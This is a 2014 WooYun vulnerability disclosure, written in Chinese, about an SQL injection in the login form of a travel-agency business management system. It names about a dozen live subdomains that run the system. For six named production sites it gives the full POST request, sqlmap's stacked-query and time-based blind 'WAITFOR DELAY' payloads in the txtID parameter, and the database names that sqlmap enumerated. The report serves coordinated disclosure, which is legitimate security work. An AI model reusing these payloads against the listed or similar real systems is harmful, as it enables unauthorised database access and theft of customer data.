漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-077311
漏洞标题:某业务管理系统存在通用型SQL注入漏洞
相关厂商:苏州赛思科技有限公司
漏洞作者: Mr.leo
提交时间:2014-09-25 17:57
修复时间:2014-12-24 17:58
公开时间:2014-12-24 17:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-25: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-02: 细节向第三方安全合作伙伴开放
2014-11-23: 细节向核心白帽子及相关领域专家公开
2014-12-03: 细节向普通白帽子公开
2014-12-13: 细节向实习白帽子公开
2014-12-24: 细节向公众公开
简要描述:
BOOM!!!
详细说明:
苏州赛思科技有限公司 开发的星联盟综合业务管理系统
公司案例http://www.sz-ss.net/Advantage/anlizhanshi/
百度搜索关键字:星联盟综合业务管理系统用户登录
http://www.999star.com/ 星联盟综合业务管理系统共开设10套子系统
A
安徽事达航空国际旅行社有限公司(hf.999star.com)
C
长沙事达国际旅行社有限公司(cs.999star.com)
G
供应商订单签收系统(gys.999star.com)
H
海南万悦旅行社有限公司南京分公司(nj.999star.com)
H
海南事达国际旅行社有限公司上海分公司(sh.999star.com)
H
海南凤凰假期(西安)(xa.999star.com)
J
江西牵手旅行社有限公司(jx.999star.com)
T
太原海新之旅旅行社有限公司(ty.999star.com)
W
武汉新华国际旅行社有限公司(wh.999star.com)
X
徐州吉祥国际旅行社有限公司(xz.999star.com)
系统txtID参数存在注入
6个案例证明:
1、http://www.sciencesoft.com.cn/Login.aspx
POST /Login.aspx?ReturnUrl=/UI HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.sciencesoft.com.cn/Login.aspx
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.sciencesoft.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=edqbdbmr&txtID=1&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2bLjfk0vNHuZ9o6/u4G05gw0yP0aHBg0%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: btnLogin=edqbdbmr&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&__VIE
WSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: btnLogin=edqbdbmr&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&__VIEWS
TATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
---
[14:42:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [16]:
[*] 33LY_DEMOA
[*] 5HouyeDB
[*] [model!]
[*] [PLAS\x03]
[*] [SDLY\x02]
[*] [Tourism\x05]
[*] [WJDC\x05]
[*] CsLand
[*] mastqr
[*] msdb
[*] QYTX
[*] SNDHRaA
[*] SZDD
[*] tempdq
[*] testbase
[*] TZJKOAA
2、http://999star.com/Login.aspx
POST /Login.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://999star.com/Login.aspx
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: 999star.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=wgddapbf&txtID=1&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2bLjfk0vNHuZ9o6/u4G05gw0yP0aHBg0%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: btnLogin=wgddapbf&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&__VIE
WSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: btnLogin=wgddapbf&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&__VIEWS
TATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G05gw0yP0aHBg0=
---
[14:59:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:59:30] [INFO] fetching database names
[14:59:30] [INFO] fetching number of databases
[14:59:30] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[15:00:20] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
1
[15:01:03] [INFO] adjusting time delay to 3 seconds due to good response times
6
[15:01:29] [INFO] retrieved: 33LY_DEMO
[15:09:06] [INFO] retrieved:
[16:43:00] [INFO] retrieved: WJDC
available databases [16]:
[*] 33LY_DEMO
[*] [5HouseDB\x11]
[*] [QYTX!]
[*] CsLand
[*] master
[*] modgl
[*] msdb
[*] PLAS
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] testbase
[*] tgmpdb
[*] Tourism
[*] TZJKOA
[*] WJDC
3、http://www.360ly.com/Login.aspx?ReturnUrl=%2f
POST http://www.360ly.com/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: www.360ly.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.360ly.com/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[14:59:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:59:36] [INFO] fetching database names
[14:59:36] [INFO] fetching number of databases
[14:59:36] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[15:00:26] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[16:31:28] [INFO] retrieved: TZJKOA
[16:37:57] [INFO] retrieved: WJDC
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] [msdb\x0b]
[*] [PLAS\x05]
[*] CsLand
[*] master
[*] model
[*] QYTX
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] tempdb
[*] testbase
[*] Tourism
[*] TZJKOA
[*] WJDC
4、http://xa.999star.com/Login.aspx?ReturnUrl=%2f
POST http://xa.999star.com/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: xa.999star.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xa.999star.com/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[14:59:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:59:43] [INFO] fetching database names
[14:59:43] [INFO] fetching number of databases
[14:59:43] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[15:00:33] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
1
TZJKOA
[16:48:49] [INFO] retrieved: WJDC!
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] [tempdb!\tC]
[*] [WJDC!]
[*] CsLand
[*] master
[*] model
[*] msdb
[*] PLAS
[*] QYTX
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] testbase
[*] Tourism
[*] TZJKOA
5、http://jianyin.5house.net/Login.aspx?ReturnUrl=%2f
POST http://jianyin.5house.net/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: jianyin.5house.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://jianyin.5house.net/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[15:02:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:02:31] [INFO] fetching database names
[15:02:31] [INFO] fetching number of databases
[15:02:31] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[15:03:21] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
1
[15:04:04] [INFO] adjusting time delay to 3 seconds due to good response times
6
[15:04:30] [INFO] retrieved: 33LY_DEMO
[15:12:09] [INFO] retrieved: 5Ho
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] [SDLY\x02\x02!]
[*] [tempdb\t]
[*] [testkase\t]
[*] CsLand
[*] master
[*] model
[*] msdb
[*] PLAS
[*] QYTX
[*] SNDIROA
[*] SZDD
[*] Tourism
[*] TZJKOA
[*] WJDC
6、http://hf.999star.com/Login.aspx?ReturnUrl=%2f
POST http://hf.999star.com/Login.aspx?ReturnUrl=%2f HTTP/1.1
Host: hf.999star.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hf.999star.com/Login.aspx?ReturnUrl=%2f
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
__VIEWSTATE=%2FwEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2BLjfk0vNHuZ9o6%2Fu4G05gw0yP0aHBg0%3D&txtID=1&txtPwd=2&btnLogin=
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1'; WAITFOR DELAY '0:0:5';--&txtPwd=2&btnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE+Ljfk0vNHuZ9o6/u4G0
5gw0yP0aHBg0=&txtID=1' WAITFOR DELAY '0:0:5'--&txtPwd=2&btnLogin=
---
[15:12:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:12:46] [INFO] fetching database names
[15:12:46] [INFO] fetching number of databases
[15:12:46] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[15:13:36] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
1
[15:14:19] [INFO] adjusting time delay to 3 seconds due to good response times
6
[15:14:45] [INFO] retrieved:
[16:44:39] [INFO] retrieved: Tourism
[16:51:53] [INFO] retrieved: TZJKOA
[16:57:43] [INFO] retrieved: WJDC
available databases [16]:
[*] 33LY_DEMO
[*] 5HouseDB
[*] CsLandA
[*] master
[*] modem
[*] msdb
[*] PLAS
[*] QYTX
[*] SDLY
[*] SNDHROA
[*] SZDD
[*] testbase
[*] tgmpdb
[*] Tourism
[*] TZJKOA
[*] WJDC
漏洞证明:
已经证明
修复方案:
过滤参数
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-09-29 09:59
厂商回复:
最新状态:
暂无